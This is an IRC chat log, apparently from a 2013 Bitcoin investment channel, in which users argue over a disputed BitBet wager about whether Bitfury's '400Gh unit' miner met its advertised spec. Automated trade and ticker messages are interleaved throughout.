00:57:02 fractal: YES is better answer than NO or UNDECIDED - you agree or not? Sep 07 00:57:03 admitting its use is valid for that Sep 07 00:57:15 Luke-Jr: The company defined what a unit was here http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ Sep 07 00:57:44 fractal: and they delivered a different (but better) unit than that. but the unit they delivered met the bet definition Sep 07 00:57:54 Luke-Jr: to deliver 400Gh, they need to add another M-board and R-pi, which are not interconnected like an additional H-card would be. it is therefore 2 units Sep 07 00:58:09 Luke-Jr: They delivered 2 units. not 1 unit Sep 07 00:58:52 fractal: at best you can argue it should have been a draw, but it's clearly within the judge's authority to declare it Yes here Sep 07 00:59:05 "No" would have been obviously wrong Sep 07 00:59:31 fractal: would a miner with 408.78 gh/s be conform with the advertisement of "400 gh/s"? Sep 07 01:00:06 dexX7: yes, if it was contained in a single interconnected device -- i.e. 1 unit Sep 07 01:00:36 Luke-Jr: Why? All clauses of a bet must be true for the bet to be valid. They weren't. Sep 07 01:00:49 fractal: number of boards was not a clause of the bet Sep 07 01:01:22 fractal: why did you bet at all if you weren't prepared to possibly lose? Sep 07 01:01:37 Luke-Jr: he doesn't think he wasn't prepared to lose Sep 07 01:01:46 Luke-Jr: this is the delusion. Sep 07 01:01:53 fractal: i don't ask about the definition of a unit, but want to point out that 408.78 gh/s is not 400 gh/s, which wouldn't be conform with their advertisement which stated "400 gh/s", right? Sep 07 01:02:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.02085 BTC [-] Sep 07 01:04:13 dexX7: no, that would meet performance specs. Sep 07 01:04:21 dexX7: Over 400Gh, and under 400W would be OK Sep 07 01:04:31 Under 400Gh, and Over 400W is NOT ok. Sep 07 01:04:33 [HAVELOCK] [AM100] 27 @ 0.01910001 = 0.5157 BTC [-] Sep 07 01:04:35 [HAVELOCK] [AM100] 50 @ 0.019 = 0.95 BTC [-] Sep 07 01:04:38 [HAVELOCK] [AM100] 65 @ 0.019 = 1.235 BTC [-] Sep 07 01:04:55 Luke-Jr: I wasn't prepared to lose. I bet after the manufacturer admitted that the 400Gh unit would not perform as advertised. Sep 07 01:04:58 [BTCTC] [ACTIVEMINING] 75 @ 0.003984 = 0.2988 BTC [-] Sep 07 01:05:19 [BTCTC] [ACTIVEMINING] 75 @ 0.003985 = 0.2989 BTC [+] Sep 07 01:05:37 [BTCTC] [ACTIVEMINING] 10 @ 0.003989 = 0.0399 BTC [+] Sep 07 01:05:54 [BTCTC] [ACTIVEMINING] 10 @ 0.003989 = 0.0399 BTC [+] Sep 07 01:06:19 [BTCTC] [ACTIVEMINING] 10 @ 0.00399 = 0.0399 BTC [+] Sep 07 01:06:28 fractal: link? Sep 07 01:06:43 Luke-Jr: hang on Sep 07 01:08:36 [BTCTC] [CB.IDIFF-O] 1 @ 0.00941 BTC [+] Sep 07 01:08:41 https://bitcointalk.org/index.php?topic=250249.msg3014225#msg3014225 Sep 07 01:08:47 [ANN] Bitfury ASIC sales in EU and Europe Sep 07 01:08:55 Notice how the manufacturer specifically states that they can't do 400Gh in 1 UNIT Sep 07 01:09:00 punin == bitfury Sep 07 01:09:05 words right out of his mouth Sep 07 01:09:33 fractal: this does not say what you claim Sep 07 01:09:53 [BTCTC] [LABCOIN] 5 @ 0.003467 = 0.0173 BTC [+] Sep 07 01:09:54 [BTCTC] [LABCOIN] 97 @ 0.003468 = 0.3364 BTC [+] Sep 07 01:09:56 it sure does Sep 07 01:09:59 it proves that they can't do 400Gh in 1 unit Sep 07 01:10:05 it says the boards are falling short, and refers to the new 400 Gh total as a single unit Sep 07 01:10:16 nope... read closely Sep 07 01:10:18 [BTCTC] [LABCOIN] 5 @ 0.003467 = 0.0173 BTC [-] Sep 07 01:10:32 punin is not the same person as bitfury fyi Sep 07 01:10:53 "I will ship your ordered hashrate regardless (ie. more hardware free of charge) until we fix this issue and can provide 400GH in one unit." Or, "We can't provide 400Gh in 1 unit, so we are doing X instead" Sep 07 01:11:02 ok, you're right it doesn't explicitly define unit as the 2 boards, but neither does it deny it Sep 07 01:11:15 Since they can't provide 400Gh in 1 unit, as advertised, the bet is a no. Sep 07 01:11:25 the bet says UNIT, not UNITS Sep 07 01:11:25 [BTCTC] [LABCOIN] 100 @ 0.003494 = 0.3494 BTC [+] Sep 07 01:11:44 the unit in this case is 2 boards Sep 07 01:11:55 it's not as advertised, but it does meet the advertised performance. Sep 07 01:11:58 2 M-boards is not 1 unit Sep 07 01:11:58 which is all the bet required Sep 07 01:12:00 [BTCTC] [DMS.SELLING] 7 @ 0.009899 = 0.0693 BTC [-] Sep 07 01:12:02 again the unit by definition in the bet can be a bag of cpus, a box of bananas or a handfull of shit if it does 400gh under the wattage Sep 07 01:12:10 Luke-Jr: The bet also required that the Gh be in a single UNIT Sep 07 01:12:17 it failed to meet that spec Sep 07 01:12:23 fractal: also, if you made a bet thinking the conclusion was already final, I have no sympathy for your attempted ripoff Sep 07 01:12:31 lolz Sep 07 01:12:32 ! Sep 07 01:12:48 fractal: the definition of "unit" allows for 2 boards Sep 07 01:13:02 Luke-Jr: what boards are you talking about? M-boards or H-boards? Sep 07 01:13:17 H-boards -- yes. M-boards no. if you don't know the difference, i'll be happy to explain Sep 07 01:13:18 fractal: any, the bet didn't restrict that aspect at all Sep 07 01:13:27 well, 1M-boards would be 2 units Sep 07 01:13:36 they could have shipped BFL Monarchs, and it'd have met the bet requirements Sep 07 01:13:48 (in theory, I know it wouldn't be practical) Sep 07 01:13:49 wrong, becuase it wouldn't have been in a single unit Sep 07 01:13:50 it rarely happens, but luke is right. Sep 07 01:14:09 sorry thats incorrect. the bet speaks to the units as advertised Sep 07 01:14:20 fractal: only per advertised performance Sep 07 01:14:23 not advertised design Sep 07 01:14:47 Luke-Jr: sure it does Sep 07 01:14:51 '400Gh UNIT' Sep 07 01:15:13 which is this http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ Sep 07 01:15:21 [HAVELOCK] [DEALCO] 5 @ 0.0135 = 0.0675 BTC [+] Sep 07 01:15:46 [BTCTC] [DMS.SELLING] 400 @ 0.009899 = 3.9596 BTC [-] Sep 07 01:15:52 Luke-Jr: additionally, theres absolutely nothing wrong with betting on public information, calling it an attempted ripoff is pure hyperbole, i expect more from you Sep 07 01:16:13 [HAVELOCK] [XBOND] 800 @ 0.00104 = 0.832 BTC [+] Sep 07 01:16:16 [HAVELOCK] [XBOND] 140 @ 0.001036 = 0.145 BTC [-] Sep 07 01:16:18 [HAVELOCK] [XBOND] 1000 @ 0.001035 = 1.035 BTC [-] Sep 07 01:16:20 [HAVELOCK] [XBOND] 40 @ 0.001033 = 0.0413 BTC [-] Sep 07 01:16:21 [HAVELOCK] [XBOND] 10 @ 0.001031 = 0.0103 BTC [-] Sep 07 01:16:24 [HAVELOCK] [XBOND] 10 @ 0.00103 = 0.0103 BTC [-] Sep 07 01:20:03 fractal: For a bet to be morally justifiable, the conclusion must be uncertain for both parties. Sep 07 01:20:23 http://www.newadvent.org/cathen/02539a.htm Sep 07 01:21:28 "morals" Sep 07 01:21:30 gtfo Sep 07 01:21:37 THIS IS BITCOIIIIIN Sep 07 01:21:42 new advent lmao Sep 07 01:22:01 Luke-Jr: thanks for that post -- you should refer to "If, however, one has absolutely certain evidence of the truth of his contention, and says so to the other party, he is not precluded from betting if the latter remains obstinate." Sep 07 01:22:51 Luke-Jr: I said the truth to the other party and the debate was going on for days before the bet was concluded.... I'm glad that clause was in there, i felt morally wrong for a second there... phew.. Sep 07 01:24:00 No I'm glad Luke-Jr posted that... as you can see on the bitbet comments there were many posts outlining the 'truth' before the bet was closed --- I hope Luke-Jr retracts his statement that I was trying to rip someone off Sep 07 01:24:08 fractal: the other parties in this case were not given the option to repeal their bet Sep 07 01:24:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.02085 = 0.0417 BTC [-] Sep 07 01:24:47 Luke-Jr: sure they were. They can bet on the opposite side in the appropriate amount so that the outcome neutralizes their position Sep 07 01:24:56 not the same thing Sep 07 01:25:07 sure is, they don't lose anything Sep 07 01:25:24 according to the FAQ thats how you can cancel your bet Sep 07 01:25:48 Luke-Jr: and regardless, they didn't want to repeal their bets... they were in here telling me i'm wrong Sep 07 01:26:11 so, that point doesn't really hold water either. Sep 07 01:28:40 fractal: *some of them* were in here presumably telling you *that you misunderstood the bet terms* Sep 07 01:28:58 see the third condition of moral betting: "Both must understand the matter of the bet in the same sense, and" Sep 07 01:29:01 [BTCTC] [LABCOIN] 100 @ 0.003492 = 0.3492 BTC [-] Sep 07 01:30:09 [BTCTC] [BITVPS] 10 @ 0.00216 = 0.0216 BTC [+] Sep 07 01:30:21 [BTCTC] [BITVPS] 90 @ 0.00215 = 0.1935 BTC [-] Sep 07 01:31:05 [BTCTC] [ASICMINER-PT] 1 @ 2.169 BTC [+] Sep 07 01:31:07 [BTCTC] [ASICMINER-PT] 10 @ 2.17 = 21.7 BTC [+] Sep 07 01:31:25 Luke-Jr: actually, i checked up with MP to make sure what the bet terms were before betting, to make sure that the 400Gh had to be in 1 unit. Sep 07 01:31:33 so, that argument is also moot Sep 07 01:32:23 fractal: if that is indeed accurate, you may have a case Sep 07 01:32:45 doesn't change the fact you tried to ripoff everyone else of course, so I don't really care Sep 07 01:33:43 You obviously care since you've engaged yourself so throughly in this. Nothing had been shipped when I bet. Sep 07 01:33:52 [BTCTC] [BITVPS] 10 @ 0.00215 = 0.0215 BTC [-] Sep 07 01:34:40 "The parties must have the free disposal of what they stake, and" <-- this was also not true, if you were not prepared to lose Sep 07 01:35:49 [BTCTC] [ACTIVEMINING] 10 @ 0.003978 = 0.0398 BTC [-] Sep 07 01:35:52 [BTCTC] [ACTIVEMINING] 49 @ 0.003979 = 0.195 BTC [+] Sep 07 01:38:50 fractal: do you have logs of that conversation to share? Sep 07 01:40:45 [BTCTC] [BTC-BOND] 4 @ 0.01 = 0.04 BTC [+] Sep 07 01:43:02 Luke-Jr: ok, I will retract my statement of not being prepared to lose as my definition of being prepared to lose seems to differ to yours. Sep 07 01:43:24 hopefully that settles that --- but back to the UNIT and hardware issue -- I urge you to study what a single 'UNIT' is Sep 07 01:43:35 I already linked the dictionary. Sep 07 01:43:43 There are only a limited number of 'Boards' that can fit in a UNIT Sep 07 01:43:59 fractal: logs or gtfo Sep 07 01:44:02 a UNIT -- as defined by bitfury - is whatever fits on 1 M-board] Sep 07 01:44:05 this is right out of punin's mouth Sep 07 01:44:31 benkay_: I'm sure they're somewhere... Sep 07 01:44:40 fractal: any day now. Sep 07 01:45:14 [BTCTC] [ASICMINER-PT] 1 @ 2.19 BTC [+] Sep 07 01:47:51 benkay_: any day.. Sep 07 01:50:19 [BTCTC] [DMS.MINING] 1 @ 0.0024 BTC [+] Sep 07 01:50:47 your credibility doth erode Sep 07 01:50:51 much like your capital Sep 07 01:52:23 lol... Sep 07 01:52:41 if you can show me where the logs are i'll be happy to ctrl+f Sep 07 01:52:51 thnx Sep 07 01:53:01 [BTCTC] [BTC-GROWTH] 1 @ 0.09901 BTC [-] Sep 07 01:53:16 log Sep 07 01:53:18 dot Sep 07 01:53:20 bitcoin Sep 07 01:53:22 dash Sep 07 01:53:24 assets Sep 07 01:53:25 [BTCTC] [ASICMINER-PT] 1 @ 2.19 BTC [+] Sep 07 01:53:26 [BTCTC] [ASICMINER-PT] 1 @ 2.191 BTC [+] Sep 07 01:53:26 dot Sep 07 01:53:27 [BTCTC] [ASICMINER-PT] 1 @ 2.193 BTC [+] Sep 07 01:53:28 [BTCTC] [ASICMINER-PT] 1 @ 2.197 BTC [+] Sep 07 01:53:28 [BTCTC] [ASICMINER-PT] 1 @ 2.198 BTC [+] Sep 07 01:53:29 com Sep 07 01:53:29 [BTCTC] [ASICMINER-PT] 1 @ 2.198 BTC [+] Sep 07 01:53:30 [BTCTC] [ASICMINER-PT] 13 @ 2.2 = 28.6 BTC [+] Sep 07 01:53:30 it's in the motd Sep 07 01:54:01 http://log.bitcoin-assets.com/?date=27-08-2013&display=show#262627 Sep 07 01:54:08 #bitcoin-assets log Sep 07 01:55:08 [BTCTC] [RSM] 3 @ 0.009901 = 0.0297 BTC [-] Sep 07 01:55:10 [BTCTC] [RSM] 5 @ 0.0099 = 0.0495 BTC [-] Sep 07 01:55:11 http://log.bitcoin-assets.com/?date=27-08-2013&display=show#262636 Sep 07 01:55:12 [BTCTC] [RSM] 1 @ 0.009416 BTC [-] Sep 07 01:55:12 right there Sep 07 01:55:15 [BTCTC] [RSM] 387 @ 0.009001 = 3.4834 BTC [-] Sep 07 01:55:21 you have the aribeiter telling you how the thing's going to work Sep 07 01:55:22 #bitcoin-assets log Sep 07 01:55:57 it does seem pretty clear cut. Sep 07 01:56:07 exactly -- he says 400Gh UNIT Sep 07 01:56:13 UNIT, as in singular Sep 07 01:56:19 2 UNIT != 1 UNIT Sep 07 01:56:30 2 UNITS != 1 UNIT rather Sep 07 01:56:39 500 UNITS != 1 UNIT Sep 07 01:56:45 1,000,000 != 1 UNIT Sep 07 01:56:49 oh child Sep 07 01:56:51 go home Sep 07 01:56:54 i weary of your antics Sep 07 01:56:55 negz Sep 07 01:57:15 feel free to put me on ignore. However, the bet was a no. Sep 07 01:57:22 365Gh != 400Gh Sep 07 01:57:34 I must make sure everyone knows that BitBet is infact a scam/fraud/ripoff site Sep 07 01:58:08 your dedication to this fruitless endeavour is indicative of why you'll never amount to anything Sep 07 01:58:10 "some users get pissed off with the eventual results on occasion, but what can you do." ♥ Sep 07 01:58:28 this will continue for years to come. especially for pankkake... he loves to hear about this fraud Sep 07 01:58:44 benkay_: actually, thats not the case at all Sep 07 01:58:55 benkay_: sorry. Sep 07 01:59:46 [BTCTC] [FIMB] 1 @ 0.0109 BTC [+] Sep 07 02:00:05 benkay_: however, I can tell you that your dedication to this fruitless discussion , of which you don't even have a stake in, is certainly indicative of where your priorities lie,,, you likely won't amount to anything Sep 07 02:00:31 err... certainly won't amount to anything Sep 07 02:01:30 [MPEX] [S.BBET] 5000 @ 0.00069999 = 3.5 BTC [-] Sep 07 02:02:11 [BTCTC] [ACTIVEMINING] 10 @ 0.003971 = 0.0397 BTC [-] Sep 07 02:02:31 [BTCTC] [DMS.MINING] 91 @ 0.0024 = 0.2184 BTC [+] Sep 07 02:02:42 [BTCTC] [BASIC-MINING] 10 @ 0.126 = 1.26 BTC [-] Sep 07 02:02:54 [MPEX] [S.BBET] 5000 @ 0.00074999 = 3.75 BTC [+] Sep 07 02:04:38 [BTCTC] [ACTIVEMINING] 100 @ 0.003974 = 0.3974 BTC [+] Sep 07 02:04:49 [BTCTC] [ACTIVEMINING] 377 @ 0.003974 = 1.4982 BTC [+] Sep 07 02:05:06 the main reason i'm continuing this is because I'm completely shocked that members of the community don't understand the definition of the term UNIT. Even Luke-Jr , I thought he was supposed to be considered somewhat respected, can't understand what the term UNIT means Sep 07 02:05:15 I really thought bitcoin had smarter people invovled in it Sep 07 02:05:19 seriously... shocked. Sep 07 02:05:33 [BTCTC] [ACTIVEMINING] 70 @ 0.003977 = 0.2784 BTC [+] Sep 07 02:06:42 [BTCTC] [BITVPS] 50 @ 0.00195 = 0.0975 BTC [-] Sep 07 02:06:44 [BTCTC] [BITVPS] 250 @ 0.001911 = 0.4778 BTC [-] Sep 07 02:06:45 [BTCTC] [BITVPS] 200 @ 0.001805 = 0.361 BTC [-] Sep 07 02:07:27 [MPEX] [S.MPOE] 1523 @ 0.00088528 = 1.3483 BTC [-] Sep 07 02:07:52 oh wow bitvps got shorted Sep 07 02:07:57 !ticker btctc bitvps Sep 07 02:07:59 [BTCT:BITVPS] 1D: 0.001805 / 0.00209 / 0.00216 (610 shares, 1.2 BTC), 7D: 0.00195 / 0.00226 / 0.00262 (2685 shares, 6.1 BTC), 30D: 0.001802 / 0.00251 / 0.0035 (35712 shares, 89.8 BTC) Sep 07 02:08:23 benkay_: should I tell you a few days before I launch my bitbet clone so you can short BBET on MPEX? Sep 07 02:08:25 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Sep 07 02:08:38 benkay_: it will have 0% fees Sep 07 02:08:38 your bitbet clone will fail Sep 07 02:08:58 fractal: here's more news for you: lots of these 400 Gh/s units ARE IN FACT ONE BOARD Sep 07 02:08:59 Lemme know when you launch your bitbet clone so I can make a bitbet about it failing Sep 07 02:09:28 thestringpuller: thanks, doubters give me more of a drive to succeed. I appreciate it. Sep 07 02:09:30 [BTCTC] [RSM] 1 @ 0.009003 BTC [+] Sep 07 02:09:31 [BTCTC] [RSM] 6 @ 0.009002 = 0.054 BTC [-] Sep 07 02:09:33 [BTCTC] [RSM] 8 @ 0.009 = 0.072 BTC [-] Sep 07 02:09:34 [BTCTC] [RSM] 2 @ 0.009 = 0.018 BTC [-] Sep 07 02:09:34 [BTCTC] [RSM] 1 @ 0.008967 BTC [-] Sep 07 02:09:35 [BTCTC] [RSM] 99 @ 0.00888 = 0.8791 BTC [-] Sep 07 02:09:37 [BTCTC] [RSM] 17 @ 0.0086 = 0.1462 BTC [-] Sep 07 02:09:38 [BTCTC] [RSM] 16 @ 0.00817 = 0.1307 BTC [-] Sep 07 02:09:52 Luke-Jr: source? not a single 400Gh UNIT was shipped before Sept 1. Sep 07 02:10:19 fractal it's not doubt it statistics Sep 07 02:10:24 fractal: buzzdave Sep 07 02:10:27 Bitbet in itself took a very long time to become successful Sep 07 02:10:33 how are you going to monetize with 0% fees? Sep 07 02:10:34 you can't Sep 07 02:10:35 fractal: and I doubt the hardware changed Sep 07 02:10:36 you are dumb Sep 07 02:10:42 most likely they had a software issue originally Sep 07 02:11:10 thestringpuller: thats why I'm smart. I know how to make money with 0% fees, and you don't Sep 07 02:11:27 keep it coming. Sep 07 02:11:28 thestringpuller: but again, i appreciate the doubts, it helps me to code. Sep 07 02:11:36 Code is 1% of a business bro. Sep 07 02:11:45 thanks... more plz Sep 07 02:11:57 Do you honestly think code is the entire business? Sep 07 02:12:05 ;;ident fractal Sep 07 02:12:05 gonna print your quotes out. Sep 07 02:12:05 Nick 'fractal', with hostmask 'fractal!4f812986@gateway/web/freenode/ip.79.129.41.134', is not identified. Sep 07 02:12:16 ;;getrating fractal Sep 07 02:12:16 Use the gettrust command instead. See http://wiki.bitcoin-otc.com/wiki/OTC_Rating_System#Relying_on_the_rating Sep 07 02:12:17 Luke-Jr: link/url/source please Sep 07 02:12:28 [BTCTC] [CRYPTO-TRADE] 29 @ 0.1999 = 5.7971 BTC [+] Sep 07 02:12:42 fractal: I asked him personally Sep 07 02:12:54 Luke-Jr: heresay doesn't really help.... Sep 07 02:13:16 note buzzdave represents the other manuf of the same boards Sep 07 02:13:31 so it's possible the Europeans have some problems, but the point is the hardware is the same Sep 07 02:13:47 Luke-Jr: the bet is about only bitfurystrikesback. not the other manufacturers. please read the bet language again to clarify Sep 07 02:14:10 fractal: are you in US? Sep 07 02:14:45 thestringpuller: I use multiple VPN's to connect here. Sep 07 02:15:05 thestringpuller: i'm already betting against it on bitbet Sep 07 02:15:12 that's irrelevant if you operate IN the us Sep 07 02:15:19 you WILL get hit with Reco charges Sep 07 02:15:24 thestringpuller: not in the US Sep 07 02:15:59 even benkay_ thinks you're a n00b an he's like the nicest guy ever Sep 07 02:16:00 go away Sep 07 02:16:20 thestringpuller: negz... Again, as I said... the negativity and doubting drives me. Sep 07 02:16:42 nice? Sep 07 02:16:45 polite maybe Sep 07 02:16:57 Good for you. Then when you crash and burn, will that fuel feed you as you starve? Sep 07 02:16:58 and only most of the time. Sep 07 02:17:42 thestringpuller: food. Sep 07 02:17:50 to prevent starvation, one eats food Sep 07 02:18:25 thestringpuller: http://en.wikipedia.org/wiki/Food check out this link Sep 07 02:18:58 fractal: do you know why bitbet is successful? Sep 07 02:19:11 If you honestly can't answer that question you have already failed. Sep 07 02:19:36 thestringpuller: loaded question, as its not objective. try again though. Sep 07 02:20:00 no it's a simple answer Sep 07 02:20:05 thestringpuller: no, its not. Sep 07 02:20:27 there are many factors, many subjective variables... many points to be made. sorry. Sep 07 02:20:54 not at all there is one factor in which drove it's core value Sep 07 02:21:15 thestringpuller: actually, no, there isn't. Sep 07 02:22:40 wow benkay_ where is that bet? this is easy money Sep 07 02:23:42 We've spotted a minor (potentially major) security issue with the image that was distributed with the shipped units. The user pi and root both have some ssh credentials set. You should remove these so that no one can access your unit. (This should not be such big issue if you're behind NAT). Sep 07 02:23:48 finally, vindication Sep 07 02:23:56 a UNIT is somehting that has only 1 Rasbperry pi Sep 07 02:24:02 thats from punin's mouth Sep 07 02:24:08 yep. looks like I'm right. Sep 07 02:24:11 wow. finally. Sep 07 02:24:30 YES. AMAZING. after all these years of discussion,.... phew. Sep 07 02:27:09 oh looks like I won my first bitbet bet. but I don't know which one it is Sep 07 02:27:30 put your address in search bar Sep 07 02:27:38 and select 'closed' Sep 07 02:27:50 eh Sep 07 02:27:52 'resolved' Sep 07 02:28:05 oh cool Sep 07 02:28:45 you can mix the addresses and keywords for better filtering Sep 07 02:28:51 ok well I won almost nothing but that was http://bitbet.us/bet/490/btc-network-difficulty-to-top-69-million-by/ Sep 07 02:29:16 despite having a decent weight no one dared to vote No Sep 07 02:29:29 lol Sep 07 02:29:34 obvious Sep 07 02:29:46 I'd bet on 1mil, but then I'd have to find out what the laws regulating betting are here :/ Sep 07 02:30:04 (1mil by 2014, that is) Sep 07 02:30:07 [BTCTC] [LABCOIN] 5 @ 0.003401 = 0.017 BTC [-] Sep 07 02:30:18 [BTCTC] [LABCOIN] 2 @ 0.0034 = 0.0068 BTC [-] Sep 07 02:30:56 [BTCTC] [DMS.MINING] 8 @ 0.002428 = 0.0194 BTC [+] Sep 07 02:30:58 Difficulty will be well over 600Million by december. Sep 07 02:31:16 Unless there are significant failures to deliver Sep 07 02:31:56 [BTCTC] [LABCOIN] 40 @ 0.003373 = 0.1349 BTC [-] Sep 07 02:31:58 [BTCTC] [LABCOIN] 10 @ 0.003374 = 0.0337 BTC [+] Sep 07 02:32:33 [BTCTC] [DMS.MINING] 8 @ 0.002439 = 0.0195 BTC [+] Sep 07 02:33:41 Luke-Jr: to clarify what a unit is ... punin just issued an alert for ssh credentials on a R-pi "The user pi and root both have some ssh credentials set. You should remove these so that no one can access your unit." See how he says that accessing a R-pi, gives access to your UNIT? Only 1M-board can be plugged into a R-pi, and only 16 H-card fit on 1 M-board. This means that the maxiumum performance from a UNIT is 365Gh.. Sep 07 02:34:21 I certainly hope you'll agree that after the second reference to what a UNIT is, that bitfurystrikesback.com has no single UNIT that performs at 365Gh Sep 07 02:34:46 you prolly mean 400 there Sep 07 02:35:19 yes. sorry. no UNIT that performs at 400Gh Sep 07 02:35:21 which means the bet is NO Sep 07 02:35:44 can't believe that so many people can't understand basic english, Sep 07 02:35:59 its mind blowing... i really though people invovled in bitocin were overall intelligent. Sep 07 02:36:04 wow Sep 07 02:36:18 nope just a buncha tards here Sep 07 02:36:51 looks like it... there have to be some smart people though... somewhere? Sep 07 02:37:40 [HAVELOCK] [AM100] 10 @ 0.01999 = 0.1999 BTC [+] Sep 07 02:37:43 [HAVELOCK] [AM100] 50 @ 0.02 = 1 BTC [+] Sep 07 02:37:45 [HAVELOCK] [AM100] 165 @ 0.02 = 3.3 BTC [+] Sep 07 02:37:55 ?? looks like Luke-Jr and other are silent at the face of facts Sep 07 02:38:02 this is the creap of the crop Sep 07 02:38:07 cream Sep 07 02:38:21 luke-jr: not much else to say after you're wrong and have too much pride to admit it? Sep 07 02:38:33 pride is one of the 7 deadly sins, no? Sep 07 02:39:49 fractal: except I'm not wrong Sep 07 02:40:10 Luke-Jr: according to punin, you are Sep 07 02:40:13 nope Sep 07 02:40:19 I'm sure he didn't mean to settle a bet with that Sep 07 02:40:29 and even if he did, he isn't the bet's judge Sep 07 02:41:03 a 400Gh Unit is whatever fits on 1Raspberry Pi. thats a maxmimum of 16 H-cards. 365Gh. != 400Gh.. pretty simple. you're wrong. Sep 07 02:41:14 its not rocket science. thats a unit. Sep 07 02:41:18 UNIT. singular. Sep 07 02:41:57 right, I'm pointing out that BitBet incorrectly marks bets yes when they should be no. based on english. Sep 07 02:41:58 bet the same unit runs at 400 Gh if you put BFGMiner on it <.< Sep 07 02:42:07 not based on English, no. Sep 07 02:42:10 Luke-Jr: It doesn't. Sep 07 02:42:15 English's definition of unit allows for "yes" here Sep 07 02:42:18 Luke-Jr: The UNIT does not run at 400Gh. Sep 07 02:42:28 Luke-Jr: No, it doesn't. sorry. Sep 07 02:44:36 Luke-Jr: At this point, you're still free to try and define a UNIT as something other then 1M-board attached to a raspberry pi.... but I think you'll fail... the thread is still there... go ahead. Sep 07 02:44:52 otherwise you should do the right thing and retract your statement Sep 07 02:45:35 but, of course you won't post again to the thread because people would see that you're wrong and you'd look pretty stupid .... Sep 07 02:48:21 [BTCTC] [ASICMINER-PT] 1 @ 2.199 BTC [-] Sep 07 02:50:49 fkn drama up in hurr Sep 07 02:50:55 [BTCTC] [LABCOIN] 1 @ 0.003374 BTC [+] Sep 07 02:50:56 how much are the new AM blades? Sep 07 02:50:57 [BTCTC] [LABCOIN] 1 @ 0.003374 BTC [+] Sep 07 02:51:22 3.5BTC Sep 07 02:51:27 !ticker btc asicminer Sep 07 02:51:29 I don't know those people, and they don't look very friendly. Sep 07 02:51:45 !ticker btc asicminer-pt Sep 07 02:51:47 [BTCT:ASICMINER-PT] 1D: 1.93 / 2.09589 / 2.32 (368 shares, 771.3 BTC), 7D: 1.927 / 2.31758 / 2.609 (2665 shares, 6176.4 BTC), 30D: 1.927 / 2.99027 / 4.299 (15683 shares, 46896.4 BTC) Sep 07 02:52:18 ;;ticket --market all Sep 07 02:52:19 Error: "ticket" is not a valid command. Sep 07 02:52:22 ;;ticker --market all Sep 07 02:52:28 MtGox BTCUSD last: 122.98498, vol: 17923.75796405 | Bitstamp BTCUSD last: 117.61, vol: 19237.53145019 | BTC-E BTCUSD last: 113.004, vol: 4994.03379 | Bitfinex BTCUSD last: 117.0, vol: 1679.07962362 | CampBX BTCUSD last: 117.42, vol: 1260.47891117 | Volume-weighted last average: 119.208265448 Sep 07 02:53:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.02078 = 0.0416 BTC [-] Sep 07 02:53:25 Luke-Jr: still waiting for your clarification on what a 'unit' is on the forum post? Sep 07 02:55:19 crickets? thought so... Sep 07 02:56:36 [BTCTC] [DMS.MINING] 330 @ 0.0024 = 0.792 BTC [-] Sep 07 02:57:09 [BTCTC] [LABCOIN] 120 @ 0.003372 = 0.4046 BTC [-] Sep 07 02:57:09 [BTCTC] [LABCOIN] 850 @ 0.00337 = 2.8645 BTC [-] Sep 07 02:57:11 [BTCTC] [LABCOIN] 60 @ 0.00335 = 0.201 BTC [-] Sep 07 02:57:57 [BTCTC] [LABCOIN] 33 @ 0.003299 = 0.1089 BTC [-] Sep 07 02:57:58 [BTCTC] [LABCOIN] 67 @ 0.0033 = 0.2211 BTC [+] Sep 07 02:58:10 [BTCTC] [LABCOIN] 33 @ 0.0033 = 0.1089 BTC [+] Sep 07 02:59:00 and buttfury are shipping? Sep 07 02:59:26 yes, but they missed hardware performance numbers Sep 07 02:59:33 400Gh unit is only 365Gh Sep 07 02:59:44 they'll ship more hardware to make up for it though... or so they say. Sep 07 03:01:17 and if you order 400gh you get more than 400gh or something Sep 07 03:01:32 [BTCTC] [LTC-ATF.B2] 3 @ 0.01228 = 0.0368 BTC [+] Sep 07 03:01:38 oh yes missed teh last line Sep 07 03:02:24 so instead of a big butt you get two smaller butts Sep 07 03:02:33 a matter of preference it seems Sep 07 03:02:38 hey fractal you know what Sep 07 03:03:00 if you gonna bitch around about bitbet and such, i reccomend you use the referral link - at least you will get paid for it Sep 07 03:04:23 hahaha... thanks for the tip Sep 07 03:04:36 Luke-Jr: ref "betting when one is certain of the outcome" - this is implicitly allowed by the bitbet faq: "Bets will not be cancelled because it became impossible for one side to win" Sep 07 03:07:28 [BTCTC] [LTC-ATF.B2] 6 @ 0.01229 = 0.0737 BTC [+] Sep 07 03:07:49 dexX7: thanks for pointing that out. Sep 07 03:08:15 you see, we are not all that bad. Sep 07 03:08:43 [BTCTC] [LABCOIN] 1 @ 0.0033 BTC [+] Sep 07 03:08:55 Luke-Jr: care to respond? all bettors agree that " Bets will not be cancelled because it became impossible for one side to win" before betting... I'd like for your to retract your statement that betting after the outcome has been determined is a scam or ripoff? Sep 07 03:09:17 thanks for pointing that out dexX7. Sep 07 03:09:17 why do you care what crazy has to say? Sep 07 03:10:26 [BTCTC] [LABCOIN] 51 @ 0.003304 = 0.1685 BTC [+] Sep 07 03:12:08 YOU ARE INANIMATE FUCKING OBJECT Sep 07 03:12:19 gah Sep 07 03:12:23 wrong window again Sep 07 03:12:56 fractal: how many coins did you bet anyway? Sep 07 03:13:23 dexX7: not much. its irrelevant tho Sep 07 03:13:31 wrong bet is still a wrong bet ;) Sep 07 03:14:06 [BTCTC] [LABCOIN] 1000 @ 0.003304 = 3.304 BTC [+] Sep 07 03:17:22 [BTCTC] [LABCOIN] 1 @ 0.00328 BTC [-] Sep 07 03:18:17 [BTCTC] [LABCOIN] 120 @ 0.003303 = 0.3964 BTC [+] Sep 07 03:19:08 [BTCTC] [LABCOIN] 1 @ 0.00329 BTC [-] Sep 07 03:20:08 [BTCTC] [LABCOIN] 12 @ 0.003301 = 0.0396 BTC [+] Sep 07 03:20:50 https://forum.litecoin.net/index.php/topic,551.msg44484.html#msg44484 "Initial Lane Powell Legal Fees/Retainer 505.05050000 BTC" Sep 07 03:20:55 [LTC-GLOBAL] the Litecoin Global Virtual Stock Exchange - Public Beta Sep 07 03:22:20 [MPEX] [S.MPOE] 7856 @ 0.00088565 = 6.9577 BTC [+] Sep 07 03:23:18 [BTCTC] [LABCOIN] 5 @ 0.003301 = 0.0165 BTC [+] Sep 07 03:24:08 